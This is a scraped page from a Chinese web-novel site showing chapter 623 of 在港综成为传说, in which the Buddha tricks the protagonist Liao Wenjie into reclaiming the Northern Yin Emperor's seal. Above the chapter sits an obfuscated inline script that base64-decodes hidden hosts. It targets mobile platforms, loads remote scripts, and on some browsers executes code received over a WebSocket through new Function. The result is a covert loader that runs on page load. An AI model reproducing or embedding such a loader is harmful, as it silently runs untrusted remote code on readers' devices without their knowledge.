笔趣阁

字:
关灯 护眼
笔趣阁 > 在港综成为传说 > 第六百二十三章 我想请几天假
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第六百二十三章 我想请几天假

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
“廖施主,事已至此,何以愿违,难道你还打算负隅顽抗吗?”
  
  背后传来电灯泡的光芒,暖色调,直把廖文杰懵逼的五官照得轮廓分明,他目瞪口呆转身,一看,还真有个笑里藏刀的田螺头。
  
  这张脸廖文杰以前见过,勘破虚妄直达根源时,窥探到的大日如来就是这张面孔。区别是,那时的大日如来恢弘无限大,现在就是一身高体型一般的普通和尚,还有点富态。
  
  当然了,发型并不普通,卷得离谱。
  
  “原来是佛祖,有失远迎……”
  
  廖文杰干笑两声,百思不得骑姐,晃悠悠站起身:“竟然是佛祖,你还真敢进来,我说句难听话,我要是认栽了,自甘堕落取回帝位,都能新建个十九层地狱把你压在下面。”
  
  屁股朝外!
  
  都是有身份的人,有些话廖文杰没有挑明,但他知道,以佛祖的智慧,肯定能参透言语间隐藏的奥妙。
  
  “施主还是这么爱说笑,贫僧只想请施主去灵山小住,携礼而来,何罪之有?”大日如来笑道。
  
  你们这群出家人,就喜欢打妄语,真到了你的地盘,是剃光头还是烫卷发,还不是你一句话的事。
  
  廖文杰心头不屑,身在幽冥有恃无恐,挥挥手赶苍蝇一般道:“佛祖快回吧,与其在我这浪费时间,不如去找猴子的乐子,至于度我上灵山……呵呵,我这尊神太大,大雷音寺庙小装不下。”
  
  “廖施主,你错了,不是贫僧度你去灵山,而是你心甘情愿与贫僧去灵山才对。”大日如来意味深长笑了笑。
  
  “我脑子被门夹了才会心甘……”
  
  廖文杰嗤笑,抬手在脑门上点了点,触及一块金属硬物,当即脸色狂变,后半句话也戛然而止。
  
  金箍。
  
  从唐三藏手中获得,本属于至尊宝的金箍,不知何时戴在了他头顶,一触即生根,仿佛长在了身上,故而毫无重量,以至于他之前都没有发现。
  
  “原来如此,这也在佛祖的算计之中!”
  
  廖文杰眼眸骤缩,他帮至尊宝改变命运的时候,为防金箍再生事端,便将其收入了法相空间进行封存,想必就是之前显化法相的时候,才给了大日如来可趁之机。
  
  往深一点想,至尊宝变不变猴子并不重要,重要的是金箍一定要落在他手里。再深一点,当初窥得大日如来法身,凝聚法相的时候,对方便已经先行落子。
  
  廖文杰抿了抿发干的嘴唇,好长远的布局,好恐怖的心机,就连他的性格都了如指掌,算准了他一定会插手至尊宝的命运……
  
  这金箍,他服了,还是那句话,怪他心思太纯洁,斗不过这些动辄几千年打个盹的老妖怪。
  
  大日如来双手合十,客气道:“廖施主,贫僧有一咒,奈何太伤和气,还请不要为难贫僧。”
  
  “有本事你就念,我要是喊一下疼,我就……等会儿,你还真念啊!”
  
  廖文杰脑门刺痛,一双红目看向北方,在大日如来念动咒语的同时,猛地挥手一招。
  
  以前他有的选,所以想法很多,现在只有一个,大日如来不讲情面,他临死也要拉一个垫背的。
  
  轰隆隆!!!
  
  黑色光束冲天,幽冥撼动,天幕为之一震。
  
  气流狂飙,神光流溢。
  
  一枚四方大印直冲而来,其形天圆地方,王势无双,其书奉行天命,霸气绝伦,是北阴天子之宝,是幽冥无上权威和地位的最高体现。
  
  北阴天子之宝入手,无尽黑气加身,廖文杰气势骤变,一瞬爆发出足以镇压一切的力量。而整个幽冥之内的元气则沸腾狂啸,高涨焚天煮海的炙热气息,仿佛下一秒便有席卷整个天地的灭世狂潮降临。
  
  “善哉,善哉,施主历经轮回之劫,今日功德圆满,当真可喜可贺。”大日如来淡笑点头,身影淡化虚无,也不管廖文杰听没听见,直接回了灵山。
  
  改天再来祝贺北阴天子重回帝位。
  
  幽冥之中,惊爆持续,随着一声若有似无的气泡破碎声,狂潮退散,一切归于平静。
  
  才怪。
  
  这么大动静,就跟翻了天一样,幽冥的官吏、鬼差和鬼帝鬼神们既不瞎也不聋,一个个全部都炸了,乱糟糟四处寻人,绿幽幽的灯笼四处可见。
  
  廖文杰拿着玉玺大印,望着前方空无一人,迷茫眨眨眼,感觉有哪里不对。
  
  如料不差,这叫计中计,他被和尚飙演技糊弄了。
  
  片刻后,他抬手摸了摸脑门,果真不假,金箍一碰便碎,粉粉碎,直接变了金粉。
  
  再一摸头上冕旒,以及身上的黑色帝袍,廖文杰嘴角抽抽,将其散去变回本来的衣物。
  
  “有一说一,纯当事人,就我这誓与毒赌不共戴天的气质,穿了黄袍也不像皇帝啊!”他抬手将大印扔向北六宫,唉声叹气蹲回了草丛。
  
  还行,问题不大,廖文杰觉得自己还能再挣扎一下。
  
  只是取回帝位神位而已,一群打下手的跑腿小弟,瞎凑热闹,他不出去,这些人还敢把他架出去不成?
  
  笑死,这里是幽冥地府,他才是老大好吧!
  
  “贤弟,真是令为兄怀念不已,一别多载,你蹲草丛的雄姿还是不减曾经呢!”
  
  “……”
  
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师